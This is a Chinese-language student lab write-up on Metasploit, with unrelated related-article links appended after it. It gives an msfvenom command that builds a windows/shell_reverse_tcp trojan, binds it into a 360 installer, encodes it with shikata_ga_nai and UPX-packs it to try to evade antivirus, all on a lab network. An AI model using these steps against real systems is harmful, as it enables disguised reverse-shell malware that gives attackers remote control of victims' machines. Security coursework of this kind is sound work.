Metasploit实现木马生成、捆绑、免杀

1.预备知识

(1)Metasploit

Metasploit是一款开源的安全漏洞检测工具,全称叫做The Metasploit Framework,简称MSF。MSF是一个漏洞框架,它允许使用者开发自己的漏洞脚本,从而进行测试。下图为Metasploit的体系结构:

          图片来源玩转Metasploit系列(第一集)

基础库文件

  • Rex:Metasploit中的基础库,用于支持不同的协议、转换,以及套接字处理
  • MSF CORE:该库对框架进行了定义,同时提供Metasploit的基本应用界面
  • MSF BASE:该库提供了Metasploit框架的一个简化的、友好的应用界面

模块(通过Metasploit框架所装载、集成并对外提供的最核心的渗透测试功能实现代码)

  • 渗透攻击模块(Exploits):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对目标系统访问控制权的代码组件
  • 攻击载荷模块(Payloads):在渗透攻击成功后促使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接
  • 编码器模块(Encoders):确保攻击载荷中不会出现渗透攻击过程中应加以避免的”坏字符“;对攻击载荷进行”免杀“处理
  • 后渗透攻击模块(Post-Modes):主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各种各样的后渗透攻击动作,比如获取敏感信息,进一步括展,实施跳板攻击等
  • 辅助模块(Auxiliary):没有攻击载荷的漏洞攻击,用于诸如端口扫描、指纹验证、服务扫描等任务中

(2)攻击载荷工具

  • msfpayload:用于生产并输出Metasploit所有类型的可用shell代码
  • msfencode:对msfpayload生成的shell代码进行编码,使得shell代码能够适应目标系统环境,更好地实现其功能
  • msfvenom:是msfpayload和msfencode的混合体

2.实验

(1)选择攻击载荷

输入msfconsole进入metasploit控制台:

输入show payloads查看所有可以使用的攻击载荷信息:

此次实验我们使用的是windows/shell_reverse_tcp(一个简单的反弹shell程序,功能是连接靶机的命令行)。

(2)选择捆绑文件

可以创建自己的EXE文件,也可以捆绑到其他EXE文件。本次实验选择捆绑,我找了360的安装软件(360.exe)

(3)免杀

制作一个免杀的木马来绕过杀毒软件的检测。在Meatsploit框架下免杀的方式之一是使用MSF编码器。msfvenom -l encoders查看编码方式(并不是所有的编码方式都在windows系统上可用):

本次实验选择x86/shikata_ga_nai

(4)生成、捆绑、免杀的实现

实验环境:

攻击机 Kali linux IP:192.168.177.133

靶机 win7 IP:192.168.177.1

命令解释:

msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻击载荷

LHOST=192.168.177.133                 设置攻击者IP地址

LPORT=8080                          设置攻击者的监听端口,用于接收木马的链接请求

-e x86/shikata_ga_nai                 使用shikata_ga_nai的编码方式

-x 360.exe                            将木马捆绑在360.exe上

-i 5                                  对目标进行5次编码

-f exe                                指定MSF编码器输出格式为exe

-o /root/backdoor.exe                 指定处理完毕后的文件输出路径

下面进行测试,设置好后等待木马的链接:

在win7上运行制作好的backdoor.exe,很遗憾被360查杀:

用不同的编码方式多编码几次:

运行后仍旧被360查杀:

再尝试加壳处理,输入upx参看upx加壳软件参数。upx -5 backdoor.exe 对backdoor.exe进行加壳(此处为压缩处理,加壳的不便之处就是会改变源文件的大小,有经验的安全人员很容易发现这点差别):

尴尬 ......依然被查杀,可以看到木马名称有变:

由于是第一次接触安全系统与软件,所以本次实验感谢王政同学的指导,遇到的问题再仔细琢磨后解决。

2017-2018-1 20179202《Linux内核原理与分析》第十一周作业的更多相关文章

  1. 20169212《Linux内核原理与分析》第二周作业

    <Linux内核原理与分析>第二周作业 这一周学习了MOOCLinux内核分析的第一讲,计算机是如何工作的?由于本科对相关知识的不熟悉,所以感觉有的知识理解起来了有一定的难度,不过多查查资 ...

  2. 20169210《Linux内核原理与分析》第二周作业

    <Linux内核原理与分析>第二周作业 本周作业分为两部分:第一部分为观看学习视频并完成实验楼实验一:第二部分为看<Linux内核设计与实现>1.2.18章并安装配置内核. 第 ...

  3. 2018-2019-1 20189221 《Linux内核原理与分析》第九周作业

    2018-2019-1 20189221 <Linux内核原理与分析>第九周作业 实验八 理理解进程调度时机跟踪分析进程调度与进程切换的过程 进程调度 进度调度时机: 1.中断处理过程(包 ...

  4. 2017-2018-1 20179215《Linux内核原理与分析》第二周作业

    20179215<Linux内核原理与分析>第二周作业 这一周主要了解了计算机是如何工作的,包括现在存储程序计算机的工作模型.X86汇编指令包括几种内存地址的寻址方式和push.pop.c ...

  5. 2019-2020-1 20199329《Linux内核原理与分析》第九周作业

    <Linux内核原理与分析>第九周作业 一.本周内容概述: 阐释linux操作系统的整体构架 理解linux系统的一般执行过程和进程调度的时机 理解linux系统的中断和进程上下文切换 二 ...

  6. 2019-2020-1 20199329《Linux内核原理与分析》第二周作业

    <Linux内核原理与分析>第二周作业 一.上周问题总结: 未能及时整理笔记 Linux还需要多用 markdown格式不熟练 发布博客时间超过规定期限 二.本周学习内容: <庖丁解 ...

  7. 2019-2020-1 20209313《Linux内核原理与分析》第二周作业

    2019-2020-1 20209313<Linux内核原理与分析>第二周作业 零.总结 阐明自己对"计算机是如何工作的"理解. 一.myod 步骤 复习c文件处理内容 ...

  8. 2018-2019-1 20189221《Linux内核原理与分析》第一周作业

    Linux内核原理与分析 - 第一周作业 实验1 Linux系统简介 Linux历史 1991 年 10 月,Linus Torvalds想在自己的电脑上运行UNIX,可是 UNIX 的商业版本非常昂 ...

  9. 《Linux内核原理与分析》第一周作业 20189210

    实验一 Linux系统简介 这一节主要学习了Linux的历史,Linux有关的重要人物以及学习Linux的方法,Linux和Windows的区别.其中学到了LInux中的应用程序大都为开源自由的软件, ...

  10. 2018-2019-1 20189221《Linux内核原理与分析》第二周作业

    读书报告 <庖丁解牛Linux内核分析> 第 1 章 计算工作原理 1.1 存储程序计算机工作模型 1.2 x86-32汇编基础 1.3汇编一个简单的C语言程序并分析其汇编指令执行过程 因 ...

随机推荐

  1. 京东全链路压测军演系统(ForceBot)架构解密

    摘要:全链路压测是应对电商大促容量规划最有效的手段,如何有效进行容量规划是其中的架构关键问题.京东在全链路压测方面做过多年尝试,本文转载京东商城基础平台技术专家文章,介绍其最新的自动化压测 Force ...

  2. Redis学习六:Redis的持久化-AOF

    AOF(Append Only File) 一.是什么 以日志的形式来记录每个写操作,将Redis执行过的所有写指令记录下来(读操作不记录),只许追加文件但不可以改写文件,redis启动之初会读取该文 ...

  3. CSS只改变背景透明度,不改变子元素透明度

    一般情况下,我们可以使用css的opcity属性改变某个元素的透明度,但是其元素下的子元素的透明度也会被改变,即使对子元素重新定义也没有用,例如: <div style="opacit ...

  4. 解决IE6中 PNG图片透明的终极方案-八种方案!

    “珍惜生命,远离IE6”,IE6中的bug令很多Web前端开发人员实为头疼,因此不知道烧了多少脑细胞,在众多的Bug中最令人抓狂的就是IE对png图片的不支持,导致设计师和重构师放弃了很多很炫的效果, ...

  5. 在windows的IDEA运行Presto

    After building Presto for the first time, you can load the project into your IDE and run the server. ...

  6. 【译】第九篇 SQL Server代理了解作业和安全

    本篇文章是SQL Server代理系列的第九篇,详细内容请参考原文 在这一系列的上一篇,学习了如何在SQL Server代理作业步骤启动外部程序.你可以使用过时的ActiveX系统,运行批处理命令脚本 ...

  7. JavaScript 实用技巧和写法建议

    1.前言 从大学到现在,接触前端已经有几年了,感想方面,就是对于程序员而言,想要提高自己的技术水平和编写易于阅读和维护的代码,我觉得不能每天都是平庸的写代码,更要去推敲,去摸索和优化代码,总结当中的技 ...

  8. App测试需注意

    APP测试的时候,建议让开发打好包APK和IPA安装包,测试人员自己安装应用,进行测试.在测试过程中需要注意的测试点如下: 1安装和卸载 ●应用是否可以在iOS不同系统版本或Android不同系统版本 ...

  9. perl6 HTTP::UserAgent发送post

    use HTTP::UserAgent; my $ua = HTTP::UserAgent.new; say 'All method:'; say $ua.^methods; my %data = : ...

  10. 使用脚本实现killproc的功能

    在shell提示符号下输入type killproc,会发现killproc实在 /sbin/目录下,通过man killproc可以查看这个脚本(姑且这么称为脚本)的用法,现在,把这个脚本的实现过程 ...